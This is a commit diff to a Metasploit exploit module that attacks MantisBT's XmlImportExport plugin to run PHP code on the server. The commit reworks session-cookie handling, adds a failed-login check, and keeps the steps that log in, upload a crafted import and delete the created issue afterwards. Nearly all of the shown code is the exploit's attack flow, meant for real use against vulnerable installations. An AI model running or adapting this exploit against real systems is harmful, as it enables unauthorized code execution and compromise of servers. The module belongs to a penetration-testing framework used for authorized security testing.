Fix issues reported by FireFart

itsecurityco · itsecurityco · commit 6bf1f613b6c7 · 2014-11-11T00:41:58.000-05:00
diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -39,7 +38,7 @@ def initialize(info = {})
       [
         OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
         OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
-        OptString.new('TARGETURI', [ true, 'Base directory path', '']),
+        OptString.new('TARGETURI', [ true, 'Base directory path', '/']),
       ], self.class)
   end
 
@@ -87,15 +86,13 @@ def exec_php(php_code, is_check = false)
       return false
     end
 
-    phpsessid = ' PHPSESSID' << res.get_cookies.split('PHPSESSID')[1].split('; ')[0]
+    cookies = res.get_cookies
 
     print_status('Logging in...')
     res = send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path, 'login.php'),
-      'headers'  => {
-        'Cookie' => phpsessid,
-      },
+      'cookie'   => cookies,
       'vars_post' => {
         'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
         'username' => datastore['username'],
@@ -109,15 +106,18 @@ def exec_php(php_code, is_check = false)
       return false
     end
 
-    mantis_string_cookie = ' MANTIS_STRING_COOKIE' << res.get_cookies.split('MANTIS_STRING_COOKIE')[1].split('; ')[0]
+    unless res.redirection.to_s !~ /login_page.php/
+      print_error("Wrong credentials")
+      return false
+    end
+
+    cookies = "#{ cookies } #{ res.get_cookies }"
 
     print_status("Checking XmlImportExport plugin...")
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, 'plugin.php'),
-      'headers'  => {
-        'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
-      },
+      'cookie'   => cookies,
       'vars_get' => {
         'page' => 'XmlImportExport/import',
       }
@@ -210,7 +210,7 @@ def exec_php(php_code, is_check = false)
       'method'  => 'POST',
       'uri'     => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
       'headers' => {
-        'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
+        'Cookie' => cookies,
       },
       'ctype'   => "multipart/form-data; boundary=#{ data.bound }",
       'data'    => data_post,
@@ -222,9 +222,7 @@ def exec_php(php_code, is_check = false)
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, 'my_view_page.php'),
-      'headers'  => {
-        'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
-      },
+      'cookie'   => cookies,
     })
 
     unless res && res.code == 200
@@ -242,9 +240,7 @@ def exec_php(php_code, is_check = false)
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup_page.php'),
-      'headers'  => {
-        'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
-      },
+      'cookie'   => cookies,
       'vars_get' => {
         'bug_arr[]' => issue_id,
         'action' => 'DELETE',
@@ -261,9 +257,7 @@ def exec_php(php_code, is_check = false)
     res = send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup.php'),
-      'headers'  => {
-        'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
-      },
+      'cookie'   => cookies,
       'vars_post' => {
         'bug_actiongroup_DELETE_token' => csrf_token,
         'bug_arr[]' => issue_id,
